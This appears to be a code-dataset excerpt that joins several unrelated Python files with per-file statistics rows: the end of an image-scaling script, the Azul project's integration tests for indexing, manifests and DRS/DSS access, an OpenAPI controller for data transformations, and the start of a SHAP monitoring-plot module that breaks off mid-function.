oldImage.save(targetImage)
return Result(1, 0, targetImage)
else:
if smooth:
scale = min(size / oldImage.width, size / oldImage.height)
newImage = oldImage.scale(scale)
else:
stride = int(math.ceil(max(oldImage.width / size,
oldImage.height / size)))
newImage = oldImage.subsample(stride)
newImage.save(targetImage)
return Result(0, 1, targetImage)
def summarize(summary, concurrency):
message = "copied {} scaled {} ".format(summary.copied, summary.scaled)
difference = summary.todo - (summary.copied + summary.scaled)
if difference:
message += "skipped {} ".format(difference)
message += "using {} processes".format(concurrency)
if summary.canceled:
message += " [canceled]"
Qtrac.report(message)
print()
if __name__ == "__main__":
main()
| 36.892086 | 76 | 0.63475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,267 | 0.247027 |
6a1f0af3de00ce3a7fdb8765f1bbb9115dd67f60 | 35,122 | py | Python | test/integration_test.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | test/integration_test.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | test/integration_test.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | from abc import (
ABCMeta,
)
from concurrent.futures.thread import (
ThreadPoolExecutor,
)
from contextlib import (
contextmanager,
)
import csv
from functools import (
lru_cache,
)
import gzip
from io import (
BytesIO,
TextIOWrapper,
)
import json
import logging
import os
import random
import re
import sys
import threading
import time
from typing import (
AbstractSet,
Any,
Dict,
IO,
List,
Mapping,
Optional,
Sequence,
Tuple,
cast,
)
import unittest
from unittest import (
mock,
)
import uuid
from zipfile import (
ZipFile,
)
import attr
import chalice.cli
from furl import (
furl,
)
from google.cloud import (
storage,
)
from google.oauth2 import (
service_account,
)
from hca.dss import (
DSSClient,
)
from hca.util import (
SwaggerAPIException,
)
from humancellatlas.data.metadata.helpers.dss import (
download_bundle_metadata,
)
from more_itertools import (
first,
one,
)
from openapi_spec_validator import (
validate_spec,
)
import requests
from azul import (
CatalogName,
cached_property,
config,
drs,
)
from azul.azulclient import (
AzulClient,
AzulClientNotificationError,
)
from azul.drs import (
AccessMethod,
)
import azul.dss
from azul.es import (
ESClientFactory,
)
from azul.indexer import (
BundleFQID,
)
from azul.indexer.index_service import (
IndexService,
)
from azul.logging import (
configure_test_logging,
)
from azul.modules import (
load_app_module,
)
from azul.portal_service import (
PortalService,
)
from azul.requests import (
requests_session_with_retry_after,
)
from azul.types import (
JSON,
)
from azul_test_case import (
AlwaysTearDownTestCase,
AzulTestCase,
)
log = logging.getLogger(__name__)
# noinspection PyPep8Naming
def setUpModule():
configure_test_logging(log)
class IntegrationTestCase(AzulTestCase, metaclass=ABCMeta):
bundle_uuid_prefix: str = ''
@cached_property
def azul_client(self):
return AzulClient(prefix=self.bundle_uuid_prefix)
class IndexingIntegrationTest(IntegrationTestCase, AlwaysTearDownTestCase):
prefix_length = 2
max_bundles = 64
min_timeout = 20 * 60
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.bundle_uuid_prefix = ''.join([
str(random.choice('abcdef0123456789'))
for _ in range(cls.prefix_length)
])
def setUp(self) -> None:
super().setUp()
self.pruning_seed = random.randint(0, sys.maxsize)
@contextmanager
def subTest(self, msg: Any = None, **params: Any):
log.info('Beginning sub-test [%s] %r', msg, params)
with super().subTest(msg, **params):
try:
yield
except BaseException:
log.info('Failed sub-test [%s] %r', msg, params)
raise
else:
log.info('Successful sub-test [%s] %r', msg, params)
def test(self):
@attr.s(auto_attribs=True, kw_only=True)
class Catalog:
name: CatalogName
notifications: Mapping[BundleFQID, JSON]
@property
def num_bundles(self):
return len(self.notifications)
@property
def bundle_fqids(self) -> AbstractSet[BundleFQID]:
return self.notifications.keys()
def notifications_with_duplicates(self) -> List[JSON]:
num_duplicates = self.num_bundles // 2
notifications = list(self.notifications.values())
# Index some bundles again to test that we handle duplicate additions.
# Note: random.choices() may pick the same element multiple times so
# some notifications will end up being sent three or more times.
notifications.extend(random.choices(notifications, k=num_duplicates))
return notifications
def _wait_for_indexer():
num_bundles = sum(catalog.num_bundles for catalog in catalogs)
self.azul_client.wait_for_indexer(num_expected_bundles=num_bundles,
min_timeout=self.min_timeout)
# For faster modify-deploy-test cycles, set `delete` to False and run
# test once. Then also set `index` to False. Subsequent runs will use
# catalogs from first run. Don't commit changes to these two lines.
index = True
delete = True
if index:
self._reset_indexer()
catalogs: List[Catalog] = [
Catalog(name=catalog, notifications=self._prepare_notifications(catalog) if index else {})
for catalog in config.integration_test_catalogs
]
if index:
for catalog in catalogs:
log.info('Starting integration test for catalog %r with %i bundles from prefix %r.',
catalog, catalog.num_bundles, self.bundle_uuid_prefix)
self.azul_client.index(catalog=catalog.name,
notifications=catalog.notifications_with_duplicates())
_wait_for_indexer()
for catalog in catalogs:
self._assert_catalog_complete(catalog=catalog.name,
entity_type='files',
bundle_fqids=catalog.bundle_fqids)
for catalog in catalogs:
self._test_manifest(catalog.name)
self._test_dos_and_drs(catalog.name)
self._test_repository_files(catalog.name)
if index and delete:
for catalog in catalogs:
self.azul_client.index(catalog=catalog.name,
notifications=catalog.notifications_with_duplicates(),
delete=True)
_wait_for_indexer()
for catalog in catalogs:
self._assert_catalog_empty(catalog.name)
self._test_other_endpoints()
def _reset_indexer(self):
# While it's OK to erase the integration test catalog, the queues are
# shared by all catalogs and we can't afford to trash them in a stable
# deployment like production.
self.azul_client.reset_indexer(catalogs=config.integration_test_catalogs,
# Can't purge the queues in stable deployment as
# they may contain work for non-IT catalogs.
purge_queues=not config.is_stable_deployment(),
delete_indices=True,
create_indices=True)
def _test_other_endpoints(self):
service_paths = (
'/',
'/openapi',
'/version',
'/index/summary',
'/index/files/order',
)
service_routes = (
(config.service_endpoint(), path)
for path in service_paths
)
health_endpoints = (
config.service_endpoint(),
config.indexer_endpoint()
)
health_paths = (
'', # default keys for lambda
'/', # all keys
'/basic',
'/elasticsearch',
'/queues',
'/progress',
'/api_endpoints',
'/other_lambdas'
)
health_routes = (
(endpoint, '/health' + path)
for endpoint in health_endpoints
for path in health_paths
)
for endpoint, path in (*service_routes, *health_routes):
with self.subTest('other_endpoints', endpoint=endpoint, path=path):
self._check_endpoint(endpoint, path)
def _test_manifest(self, catalog: CatalogName):
for format_, validator, attempts in [
(None, self._check_manifest, 1),
('compact', self._check_manifest, 1),
('full', self._check_manifest, 3),
('terra.bdbag', self._check_terra_bdbag, 1)
]:
with self.subTest('manifest',
catalog=catalog,
format=format_,
attempts=attempts):
assert attempts > 0
params = dict(catalog=catalog)
if format_ is not None:
params['format'] = format_
for attempt in range(attempts):
start = time.time()
response = self._check_endpoint(config.service_endpoint(), '/manifest/files', params)
log.info('Request %i/%i took %.3fs to execute.', attempt + 1, attempts, time.time() - start)
validator(catalog, response)
@lru_cache(maxsize=None)
def _get_one_file_uuid(self, catalog: CatalogName) -> str:
filters = {'fileFormat': {'is': ['fastq.gz', 'fastq']}}
response = self._check_endpoint(endpoint=config.service_endpoint(),
path='/index/files',
query=dict(catalog=catalog,
filters=json.dumps(filters),
size=1,
order='asc',
sort='fileSize'))
hits = json.loads(response)
return one(one(hits['hits'])['files'])['uuid']
def _test_dos_and_drs(self, catalog: CatalogName):
if config.is_dss_enabled(catalog) and config.dss_direct_access:
file_uuid = self._get_one_file_uuid(catalog)
self._test_dos(catalog, file_uuid)
self._test_drs(catalog, file_uuid)
@cached_property
def _requests(self) -> requests.Session:
return requests_session_with_retry_after()
def _check_endpoint(self,
endpoint: str,
path: str,
query: Optional[Mapping[str, Any]] = None) -> bytes:
query = {} if query is None else {k: str(v) for k, v in query.items()}
url = furl(endpoint, path=path, query=query)
return self._get_url_content(url.url)
def _get_url_content(self, url: str) -> bytes:
return self._get_url(url).content
def _get_url(self, url: str, allow_redirects=True) -> requests.Response:
log.info('GET %s', url)
response = self._requests.get(url, allow_redirects=allow_redirects)
expected_statuses = (200,) if allow_redirects else (200, 301, 302)
self._assertResponseStatus(response, expected_statuses)
return response
def _assertResponseStatus(self,
response: requests.Response,
expected_statuses: Tuple[int, ...] = (200,)):
self.assertIn(response.status_code,
expected_statuses,
(response.reason, response.content))
def _check_manifest(self, _catalog: CatalogName, response: bytes):
self.__check_manifest(BytesIO(response), 'bundle_uuid')
def _check_terra_bdbag(self, catalog: CatalogName, response: bytes):
with ZipFile(BytesIO(response)) as zip_fh:
data_path = os.path.join(os.path.dirname(first(zip_fh.namelist())), 'data')
file_path = os.path.join(data_path, 'participants.tsv')
with zip_fh.open(file_path) as file:
rows = self.__check_manifest(file, 'bundle_uuid')
for row in rows:
# Terra doesn't allow colons in this column, but they may
# exist in versions indexed by TDR
self.assertNotIn(':', row['entity:participant_id'])
suffix = '__file_drs_uri'
header, *rows = rows
prefixes = [
c[:-len(suffix)]
for c in header.keys()
if c.endswith(suffix)
]
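# Pick the smallest file that actually has a DRS URI so resolving and checking it below stays cheap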
size, drs_uri, name = min(
(
int(row[prefix + '__file_size']),
row[prefix + suffix],
row[prefix + '__file_name'],
)
for row in rows
for prefix in prefixes
if row[prefix + suffix]
)
log.info('Resolving %r (%r) from catalog %r (%i bytes)',
drs_uri, name, catalog, size)
plugin = self.azul_client.repository_plugin(catalog)
drs_client = plugin.drs_client()
access = drs_client.get_object(drs_uri, access_method=AccessMethod.https)
self.assertIsNone(access.headers)
self.assertEqual('https', furl(access.url).scheme)
# Try HEAD first because it's more efficient, fall back to GET if the
# DRS implementations prohibits it, like Azul's DRS proxy of DSS.
for method in ('HEAD', 'GET'):
log.info('%s %s', method, access.url)
# For DSS, any HTTP client should do but for TDR we need to use an
# authenticated client. TDR does return a Bearer token in the `headers`
# part of the DRS response but we know that this token is the same as
# the one we're making the DRS request with.
response = drs_client.http_client.request(method, access.url)
if response.status != 403:
break
self.assertEqual(200, response.status, response.data)
self.assertEqual(size, int(response.headers['Content-Length']))
def __check_manifest(self, file: IO[bytes], uuid_field_name: str) -> List[Mapping[str, str]]:
text = TextIOWrapper(file)
reader = csv.DictReader(text, delimiter='\t')
rows = list(reader)
log.info(f'Manifest contains {len(rows)} rows.')
self.assertGreater(len(rows), 0)
self.assertIn(uuid_field_name, reader.fieldnames)
bundle_uuid = rows[0][uuid_field_name]
self.assertEqual(bundle_uuid, str(uuid.UUID(bundle_uuid)))
return rows
def _test_repository_files(self, catalog: str):
with self.subTest('repository_files', catalog=catalog):
file_uuid = self._get_one_file_uuid(catalog)
response = self._check_endpoint(endpoint=config.service_endpoint(),
path=f'/fetch/repository/files/{file_uuid}',
query=dict(catalog=catalog))
response = json.loads(response)
while response['Status'] != 302:
self.assertEqual(301, response['Status'])
response = self._get_url(response['Location']).json()
content = self._get_url_content(response['Location'])
self._validate_fastq_content(content)
def _test_drs(self, catalog: CatalogName, file_uuid: str):
repository_plugin = self.azul_client.repository_plugin(catalog)
drs = repository_plugin.drs_client()
for access_method in AccessMethod:
with self.subTest('drs', catalog=catalog, access_method=AccessMethod.https):
log.info('Resolving file %r with DRS using %r', file_uuid, access_method)
drs_uri = f'drs://{config.api_lambda_domain("service")}/{file_uuid}'
access = drs.get_object(drs_uri, access_method=access_method)
self.assertIsNone(access.headers)
if access.method is AccessMethod.https:
content = self._get_url_content(access.url)
elif access.method is AccessMethod.gs:
content = self._get_gs_url_content(access.url)
else:
self.fail(access_method)
self._validate_fastq_content(content)
def _test_dos(self, catalog: CatalogName, file_uuid: str):
with self.subTest('dos', catalog=catalog):
log.info('Resolving file %s with DOS', file_uuid)
response = self._check_endpoint(config.service_endpoint(),
path=drs.dos_object_url_path(file_uuid),
query=dict(catalog=catalog))
json_data = json.loads(response)['data_object']
file_url = first(json_data['urls'])['url']
while True:
response = self._get_url(file_url, allow_redirects=False)
# We handle redirects ourselves so we can log each request
if response.status_code in (301, 302):
file_url = response.headers['Location']
try:
retry_after = response.headers['Retry-After']
except KeyError:
pass
else:
time.sleep(int(retry_after))
else:
break
self._assertResponseStatus(response)
self._validate_fastq_content(response.content)
def _get_gs_url_content(self, url: str) -> bytes:
self.assertTrue(url.startswith('gs://'))
path = os.environ['GOOGLE_APPLICATION_CREDENTIALS']
credentials = service_account.Credentials.from_service_account_file(path)
storage_client = storage.Client(credentials=credentials)
content = BytesIO()
storage_client.download_blob_to_file(url, content)
return content.getvalue()
def _validate_fastq_content(self, content: bytes):
# Check signature of FASTQ file.
with gzip.open(BytesIO(content)) as buf:
fastq = buf.read(1024 * 1024)
lines = fastq.splitlines()
# Assert first character of first and third line of file (see https://en.wikipedia.org/wiki/FASTQ_format).
self.assertTrue(lines[0].startswith(b'@'))
self.assertTrue(lines[2].startswith(b'+'))
def _prepare_notifications(self, catalog: CatalogName) -> Dict[BundleFQID, JSON]:
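# List the catalog's bundles, prune them to a manageable subset, then build one synthetic notification per bundle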
bundle_fqids = self.azul_client.list_bundles(catalog)
bundle_fqids = self._prune_test_bundles(catalog, bundle_fqids, self.max_bundles)
return {
bundle_fqid: self.azul_client.synthesize_notification(catalog, bundle_fqid)
for bundle_fqid in bundle_fqids
}
def _prune_test_bundles(self,
catalog: CatalogName,
bundle_fqids: Sequence[BundleFQID],
max_bundles: int
) -> List[BundleFQID]:
seed = self.pruning_seed
log.info('Selecting %i bundles with projects, out of %i candidates, using random seed %i.',
max_bundles, len(bundle_fqids), seed)
random_ = random.Random(x=seed)
# The same seed should give same random order so we need to have a
# deterministic order in the input list.
bundle_fqids = sorted(bundle_fqids)
random_.shuffle(bundle_fqids)
# Pick bundles off of the randomly ordered input until we have the
# desired number of bundles with project metadata.
filtered_bundle_fqids = []
for bundle_fqid in bundle_fqids:
if len(filtered_bundle_fqids) < max_bundles:
if self.azul_client.bundle_has_project_json(catalog, bundle_fqid):
filtered_bundle_fqids.append(bundle_fqid)
else:
break
return filtered_bundle_fqids
def _assert_catalog_complete(self,
catalog: CatalogName,
entity_type: str,
bundle_fqids: AbstractSet[BundleFQID]) -> None:
with self.subTest('catalog_complete', catalog=catalog):
expected_fqids = set(self.azul_client.filter_obsolete_bundle_versions(bundle_fqids))
obsolete_fqids = bundle_fqids - expected_fqids
if obsolete_fqids:
log.debug('Ignoring obsolete bundle versions %r', obsolete_fqids)
num_bundles = len(expected_fqids)
timeout = 600
indexed_fqids = set()
log.debug('Expecting bundles %s ', sorted(expected_fqids))
retries = 0
deadline = time.time() + timeout
while True:
hits = self._get_entities(catalog, entity_type)
indexed_fqids.update(
BundleFQID(bundle['bundleUuid'], bundle['bundleVersion'])
for hit in hits
for bundle in hit.get('bundles', [])
)
log.info('Detected %i of %i bundles in %i hits for entity type %s on try #%i.',
len(indexed_fqids), num_bundles, len(hits), entity_type, retries)
if len(indexed_fqids) == num_bundles:
log.info('Found the expected %i bundles.', num_bundles)
break
elif len(indexed_fqids) > num_bundles:
log.error('Found %i bundles, more than the expected %i.',
len(indexed_fqids), num_bundles)
break
elif time.time() > deadline:
log.error('Only found %i of %i bundles in under %i seconds.',
len(indexed_fqids), num_bundles, timeout)
break
else:
retries += 1
time.sleep(5)
self.assertSetEqual(indexed_fqids, expected_fqids)
entity_types = ['files', 'projects', 'samples', 'bundles']
def _assert_catalog_empty(self, catalog: CatalogName):
for entity_type in self.entity_types:
with self.subTest('catalog_empty',
catalog=catalog,
entity_type=entity_type):
hits = self._get_entities(catalog, entity_type)
self.assertEqual([], [hit['entryId'] for hit in hits])
def _get_entities(self, catalog: CatalogName, entity_type):
entities = []
size = 100
params = dict(catalog=catalog,
size=str(size))
url = furl(url=config.service_endpoint(),
path=('index', entity_type),
query_params=params
).url
while True:
response = self._get_url(url)
body = response.json()
hits = body['hits']
entities.extend(hits)
url = body['pagination']['next']
if url is None:
break
return entities
def _assert_indices_exist(self, catalog: CatalogName):
"""
Aside from checking that all indices exist this method also asserts
that we can instantiate a local ES client pointing at a real, remote
ES domain.
"""
es_client = ESClientFactory.get()
service = IndexService()
for index_name in service.index_names(catalog):
self.assertTrue(es_client.indices.exists(index_name))
class AzulClientIntegrationTest(IntegrationTestCase):
def test_azul_client_error_handling(self):
invalid_notification = {}
notifications = [invalid_notification]
self.assertRaises(AzulClientNotificationError,
self.azul_client.index,
first(config.integration_test_catalogs),
notifications)
class PortalRegistrationIntegrationTest(IntegrationTestCase):
# FIXME: Re-enable once overloading of S3 API is resolved
# https://github.com/DataBiosphere/azul/issues/2399
@unittest.skipIf(True or config.is_main_deployment(), 'Test would pollute portal DB')
def test_concurrent_portal_db_crud(self):
"""
Use multithreading to simulate multiple users simultaneously modifying
the portals database.
"""
# Currently takes about 50 seconds and creates a 25 kb db file.
n_threads = 10
n_tasks = n_threads * 10
n_ops = 5
portal_service = PortalService()
entry_format = 'task={};op={}'
def run(thread_count):
for op_count in range(n_ops):
mock_entry = cast(JSON, {
"portal_id": "foo",
"integrations": [
{
"integration_id": "bar",
"entity_type": "project",
"integration_type": "get",
"entity_ids": ["baz"]
}
],
"mock-count": entry_format.format(thread_count, op_count)
})
portal_service._crud(lambda db: list(db) + [mock_entry])
old_db = portal_service.read()
with ThreadPoolExecutor(max_workers=n_threads) as executor:
futures = [executor.submit(run, i) for i in range(n_tasks)]
self.assertTrue(all(f.result() is None for f in futures))
new_db = portal_service.read()
old_entries = [portal for portal in new_db if 'mock-count' not in portal]
self.assertEqual(old_entries, old_db)
mock_counts = [portal['mock-count'] for portal in new_db if 'mock-count' in portal]
self.assertEqual(len(mock_counts), len(set(mock_counts)))
self.assertEqual(set(mock_counts), {entry_format.format(i, j) for i in range(n_tasks) for j in range(n_ops)})
# Reset to pre-test state.
portal_service.overwrite(old_db)
class OpenAPIIntegrationTest(AzulTestCase):
def test_openapi(self):
service = config.service_endpoint()
response = requests.get(service + '/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.headers['content-type'], 'text/html')
self.assertGreater(len(response.content), 0)
# validate OpenAPI spec
response = requests.get(service + '/openapi')
response.raise_for_status()
spec = response.json()
validate_spec(spec)
class DSSIntegrationTest(AzulTestCase):
def test_patched_dss_client(self):
query = {
"query": {
"bool": {
"must_not": [
{
"term": {
"admin_deleted": True
}
}
],
"must": [
{
"exists": {
"field": "files.project_json"
}
},
{
"range": {
"manifest.version": {
"gte": "2019-04-01"
}
}
}
]
}
}
}
self.maxDiff = None
for direct in {config.dss_direct_access, False}:
for replica in 'aws', 'gcp':
if direct:
with self._failing_s3_get_object():
dss_client = azul.dss.direct_access_client()
self._test_dss_client(direct, query, dss_client, replica, fallback=True)
dss_client = azul.dss.direct_access_client()
self._test_dss_client(direct, query, dss_client, replica, fallback=False)
else:
dss_client = azul.dss.client()
self._test_dss_client(direct, query, dss_client, replica, fallback=False)
class SpecialError(Exception):
pass
def _failing_s3_get_object(self):
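# Patch the boto3 client factory so any S3 get_object call raises SpecialError while other services keep working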
def make_mock(**kwargs):
original = kwargs['spec']
def mock_boto3_client(service, *args, **kwargs):
if service == 's3':
mock_s3 = mock.MagicMock()
mock_s3.get_object.side_effect = self.SpecialError()
return mock_s3
else:
return original(service, *args, **kwargs)
return mock_boto3_client
return mock.patch('azul.deployment.aws.client', spec=True, new_callable=make_mock)
def _test_dss_client(self, direct: bool, query: JSON, dss_client: DSSClient, replica: str, fallback: bool):
with self.subTest(direct=direct, replica=replica, fallback=fallback):
response = dss_client.post_search(es_query=query, replica=replica, per_page=10)
bundle_uuid, _, bundle_version = response['results'][0]['bundle_fqid'].partition('.')
with mock.patch('azul.dss.logger') as captured_log:
_, manifest, metadata = download_bundle_metadata(client=dss_client,
replica=replica,
uuid=bundle_uuid,
version=bundle_version,
num_workers=config.num_dss_workers)
log.info('Captured log calls: %r', captured_log.mock_calls)
self.assertGreater(len(metadata), 0)
self.assertGreater(set(f['name'] for f in manifest), set(metadata.keys()))
for f in manifest:
self.assertIn('s3_etag', f)
# Extract the log method name and the first three words of log
# message logged. Note that the PyCharm debugger will call
# certain dunder methods on the variable, leading to failed
# assertions.
actual = [(m, ' '.join(re.split(r'[\s,]', a[0])[:3])) for m, a, k in captured_log.mock_calls]
if direct:
if replica == 'aws':
if fallback:
expected = [
('debug', 'Loading bundle %s'),
('debug', 'Loading object %s'),
('warning', 'Error accessing bundle'),
('warning', 'Failed getting bundle')
] + [
('debug', 'Loading file %s'),
('debug', 'Loading object %s'),
('warning', 'Error accessing file'),
('warning', 'Failed getting file')
] * len(metadata)
else:
expected = [
('debug', 'Loading bundle %s'),
('debug', 'Loading object %s')
] + [
('debug', 'Loading file %s'),
('debug', 'Loading object %s'), # file
('debug', 'Loading object %s') # blob
] * len(metadata)
else:
# On `gcp` the precondition check fails right away, preventing any attempts of direct access
expected = [
('warning', 'Failed getting bundle')
] + [
('warning', 'Failed getting file')
] * len(metadata)
else:
expected = []
self.assertSequenceEqual(sorted(expected), sorted(actual))
def test_get_file_fail(self):
for direct in {config.dss_direct_access, False}:
with self.subTest(direct=direct):
dss_client = azul.dss.direct_access_client() if direct else azul.dss.client()
with self.assertRaises(SwaggerAPIException) as e:
dss_client.get_file(uuid='acafefed-beef-4bad-babe-feedfa11afe1',
version='2018-11-19T232756.056947Z',
replica='aws')
self.assertEqual(e.exception.reason, 'not_found')
def test_mini_dss_failures(self):
uuid = 'acafefed-beef-4bad-babe-feedfa11afe1'
version = '2018-11-19T232756.056947Z'
with self._failing_s3_get_object():
mini_dss = azul.dss.MiniDSS(config.dss_endpoint)
with self.assertRaises(self.SpecialError):
mini_dss._get_file_object(uuid, version)
with self.assertRaises(KeyError):
mini_dss._get_blob_key({})
with self.assertRaises(self.SpecialError):
mini_dss._get_blob('/blobs/foo', {'content-type': 'application/json'})
with self.assertRaises(self.SpecialError):
mini_dss.get_bundle(uuid, version, 'aws')
with self.assertRaises(self.SpecialError):
mini_dss.get_file(uuid, version, 'aws')
with self.assertRaises(self.SpecialError):
mini_dss.get_native_file_url(uuid, version, 'aws')
class AzulChaliceLocalIntegrationTest(AzulTestCase):
url = furl(scheme='http', host='127.0.0.1', port=8000)
server = None
server_thread = None
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
app_module = load_app_module('service')
app_dir = os.path.dirname(app_module.__file__)
factory = chalice.cli.factory.CLIFactory(app_dir)
config = factory.create_config_obj()
cls.server = factory.create_local_server(app_obj=app_module.app,
config=config,
host=cls.url.host,
port=cls.url.port)
cls.server_thread = threading.Thread(target=cls.server.serve_forever)
cls.server_thread.start()
@classmethod
def tearDownClass(cls) -> None:
cls.server.shutdown()
cls.server_thread.join()
super().tearDownClass()
def test_local_chalice_health_endpoint(self):
url = self.url.copy().set(path='health').url
response = requests.get(url)
self.assertEqual(200, response.status_code)
catalog = first(config.integration_test_catalogs.keys())
def test_local_chalice_index_endpoints(self):
url = self.url.copy().set(path='index/files',
query=dict(catalog=self.catalog)).url
response = requests.get(url)
self.assertEqual(200, response.status_code)
def test_local_filtered_index_endpoints(self):
filters = {'genusSpecies': {'is': ['Homo sapiens']}}
url = self.url.copy().set(path='index/files',
query=dict(filters=json.dumps(filters),
catalog=self.catalog)).url
response = requests.get(url)
self.assertEqual(200, response.status_code)
| 40.231386 | 117 | 0.553442 | 33,210 | 0.945561 | 402 | 0.011446 | 5,251 | 0.149507 | 0 | 0 | 5,277 | 0.150248 |
6a1f1b69ee306e65ab06cc8411c8b814a7455225 | 4,886 | py | Python | server/openapi_server/controllers/data_transformation_controller.py | mintproject/MINT-ModelCatalogIngestionAPI | 026d3495483a3e48ea3c1364d0dda09beeea69e4 | [
"Apache-2.0"
] | 2 | 2019-05-30T21:33:43.000Z | 2019-09-27T21:04:38.000Z | server/openapi_server/controllers/data_transformation_controller.py | mintproject/model-catalog-api | 2ad7016691891497bba37afe8ceb0fea8fe769e5 | [
"Apache-2.0"
] | 82 | 2019-10-08T16:35:34.000Z | 2022-03-15T18:25:27.000Z | server/openapi_server/controllers/data_transformation_controller.py | mintproject/model-catalog-api | 2ad7016691891497bba37afe8ceb0fea8fe769e5 | [
"Apache-2.0"
] | null | null | null | import connexion
import six
from openapi_server import query_manager
from openapi_server.utils.vars import DATATRANSFORMATION_TYPE_NAME, DATATRANSFORMATION_TYPE_URI
from openapi_server.models.data_transformation import DataTransformation # noqa: E501
from openapi_server import util
def custom_datasetspecifications_id_datatransformations_get(id, custom_query_name=None, username=None): # noqa: E501
"""Gets a list of data transformations related a dataset
Gets a list of data transformations related a dataset # noqa: E501
:param id: The ID of the dataspecification
:type id: str
:param custom_query_name: Name of the custom query
:type custom_query_name: str
:param username: Username to query
:type username: str
:rtype: List[DataTransformation]
"""
return query_manager.get_resource(id=id,
custom_query_name=custom_query_name,
username=username,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_get(username=None, label=None, page=None, per_page=None): # noqa: E501
"""List all instances of DataTransformation
Gets a list of all instances of DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param username: Name of the user graph to query
:type username: str
:param label: Filter by label
:type label: str
:param page: Page number
:type page: int
:param per_page: Items per page
:type per_page: int
:rtype: List[DataTransformation]
"""
return query_manager.get_resource(
username=username,
label=label,
page=page,
per_page=per_page,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_delete(id, user=None): # noqa: E501
"""Delete an existing DataTransformation
Delete an existing DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param user: Username
:type user: str
:rtype: None
"""
return query_manager.delete_resource(id=id,
user=user,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_get(id, username=None): # noqa: E501
"""Get a single DataTransformation by its id
Gets the details of a given DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param username: Name of the user graph to query
:type username: str
:rtype: DataTransformation
"""
return query_manager.get_resource(id=id,
username=username,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_put(id, user=None, data_transformation=None): # noqa: E501
"""Update an existing DataTransformation
Updates an existing DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param user: Username
:type user: str
:param data_transformation: An old DataTransformationto be updated
:type data_transformation: dict | bytes
:rtype: DataTransformation
"""
if connexion.request.is_json:
data_transformation = DataTransformation.from_dict(connexion.request.get_json()) # noqa: E501
return query_manager.put_resource(id=id,
user=user,
body=data_transformation,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_post(user=None, data_transformation=None): # noqa: E501
"""Create one DataTransformation
Create a new instance of DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param user: Username
:type user: str
:param data_transformation: Information about the DataTransformationto be created
:type data_transformation: dict | bytes
:rtype: DataTransformation
"""
if connexion.request.is_json:
data_transformation = DataTransformation.from_dict(connexion.request.get_json()) # noqa: E501
return query_manager.post_resource(
user=user,
body=data_transformation,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
| 33.465753 | 134 | 0.731068 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,486 | 0.508801 |
6a1f4e62deeca6901732e02e6f44f1571b8f71c9 | 2,634 | py | Python | shap/plots/monitoring.py | NunoEdgarGFlowHub/shap | 6992883fb3470163fcbe2bfacae0bd5f724ed1f8 | [
"MIT"
] | 8 | 2019-09-23T16:20:40.000Z | 2021-10-09T20:26:20.000Z | shap/plots/monitoring.py | NunoEdgarGFlowHub/shap | 6992883fb3470163fcbe2bfacae0bd5f724ed1f8 | [
"MIT"
] | 1 | 2019-02-22T10:16:13.000Z | 2019-02-22T10:16:13.000Z | shap/plots/monitoring.py | NunoEdgarGFlowHub/shap | 6992883fb3470163fcbe2bfacae0bd5f724ed1f8 | [
"MIT"
] | 4 | 2019-06-28T12:50:51.000Z | 2021-07-02T07:42:18.000Z | import numpy as np
import scipy
import warnings
try:
import matplotlib.pyplot as pl
import matplotlib
except ImportError:
warnings.warn("matplotlib could not be loaded!")
pass
from . import labels
from . import colors
def truncate_text(text, max_len):
if len(text) > max_len:
return text[:int(max_len/2)-2] + "..." + text[-int(max_len/2)+1:]
else:
return text
def monitoring_plot(ind, shap_values, features, feature_names=None):
""" Create a SHAP monitoring plot.
(Note this function is preliminary and subject to change!!)
A SHAP monitoring plot is meant to display the behavior of a model
over time. Often the shap_values given to this plot explain the loss
of a model, so changes in a feature's impact on the model's loss over
time can help in monitoring the model's performance.
Parameters
----------
ind : int
Index of the feature to plot.
shap_values : numpy.array
Matrix of SHAP values (# samples x # features)
features : numpy.array or pandas.DataFrame
Matrix of feature values (# samples x # features)
feature_names : list
Names of the features (length # features)
"""
if str(type(features)).endswith("'pandas.core.frame.DataFrame'>"):
if feature_names is None:
feature_names = features.columns
features = features.values
pl.figure(figsize=(10,3))
ys = shap_values[:,ind]
xs = np.arange(len(ys))#np.linspace(0, 12*2, len(ys))
pvals = []
inc = 50
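# Slide a candidate change point through the series in steps of inc and t-test whether the SHAP values before and after it differ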
for i in range(inc, len(ys)-inc, inc):
#stat, pval = scipy.stats.mannwhitneyu(v[:i], v[i:], alternative="two-sided")
stat, pval = scipy.stats.ttest_ind(ys[:i], ys[i:])
pvals.append(pval)
min_pval = np.min(pvals)
min_pval_ind = np.argmin(pvals)*inc + inc
